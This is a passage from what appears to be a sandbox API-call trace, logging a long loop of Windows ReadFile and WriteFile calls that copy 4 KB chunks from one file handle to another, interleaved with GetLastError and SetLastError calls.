lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.050] GetLastError () returned 0x0 [0077.050] SetLastError (dwErrCode=0x0) [0077.050] GetLastError () returned 0x0 [0077.050] SetLastError (dwErrCode=0x0) [0077.050] GetLastError () returned 0x0 [0077.050] SetLastError (dwErrCode=0x0) [0077.050] GetLastError () returned 0x0 [0077.050] SetLastError (dwErrCode=0x0) [0077.050] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.050] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.051] GetLastError () returned 0x0 [0077.051] SetLastError (dwErrCode=0x0) [0077.051] GetLastError () returned 0x0 [0077.051] SetLastError (dwErrCode=0x0) [0077.051] GetLastError () returned 0x0 [0077.051] SetLastError (dwErrCode=0x0) [0077.051] GetLastError () returned 0x0 [0077.051] SetLastError (dwErrCode=0x0) [0077.051] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.051] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.051] GetLastError () returned 0x0 [0077.051] SetLastError (dwErrCode=0x0) [0077.051] GetLastError () returned 0x0 [0077.051] SetLastError (dwErrCode=0x0) [0077.051] GetLastError () returned 0x0 [0077.051] SetLastError (dwErrCode=0x0) [0077.051] GetLastError () returned 0x0 [0077.051] SetLastError (dwErrCode=0x0) [0077.051] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.051] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.052] GetLastError () returned 0x0 [0077.052] SetLastError (dwErrCode=0x0) [0077.052] GetLastError () returned 0x0 [0077.052] SetLastError (dwErrCode=0x0) [0077.052] GetLastError () returned 0x0 [0077.052] SetLastError (dwErrCode=0x0) [0077.052] GetLastError () returned 0x0 [0077.052] SetLastError (dwErrCode=0x0) [0077.052] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.052] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.052] GetLastError () returned 0x0 [0077.052] SetLastError (dwErrCode=0x0) [0077.052] GetLastError () returned 0x0 [0077.052] SetLastError (dwErrCode=0x0) [0077.052] GetLastError () returned 0x0 [0077.052] SetLastError (dwErrCode=0x0) [0077.052] GetLastError () returned 0x0 [0077.052] SetLastError (dwErrCode=0x0) [0077.053] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.053] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.053] GetLastError () returned 0x0 [0077.053] SetLastError (dwErrCode=0x0) [0077.053] GetLastError () returned 0x0 [0077.053] SetLastError (dwErrCode=0x0) [0077.053] GetLastError () returned 0x0 [0077.053] SetLastError (dwErrCode=0x0) [0077.053] GetLastError () returned 0x0 [0077.053] SetLastError (dwErrCode=0x0) [0077.053] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.053] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.053] GetLastError () returned 0x0 [0077.053] SetLastError (dwErrCode=0x0) [0077.053] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.054] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.054] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.054] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.054] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.054] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.055] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.055] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.055] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.055] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.056] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.056] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.056] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.056] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.056] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.057] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.057] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.057] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.057] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.057] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.057] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.057] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.058] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.058] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.058] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.058] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.058] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.058] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.058] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.059] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.059] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.059] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.060] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.061] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.061] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.061] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.061] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.061] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.061] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.061] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.062] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.062] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.062] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.062] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.062] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.062] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.063] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.063] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.063] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.063] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.063] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.063] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.063] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.063] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.064] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.064] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.064] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.064] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.064] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.064] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.064] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.065] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.065] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.065] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.065] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.065] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.065] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.065] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.066] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.066] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.066] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.066] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.066] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.066] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.066] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.066] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.067] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.067] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.067] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.068] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.068] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.068] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: 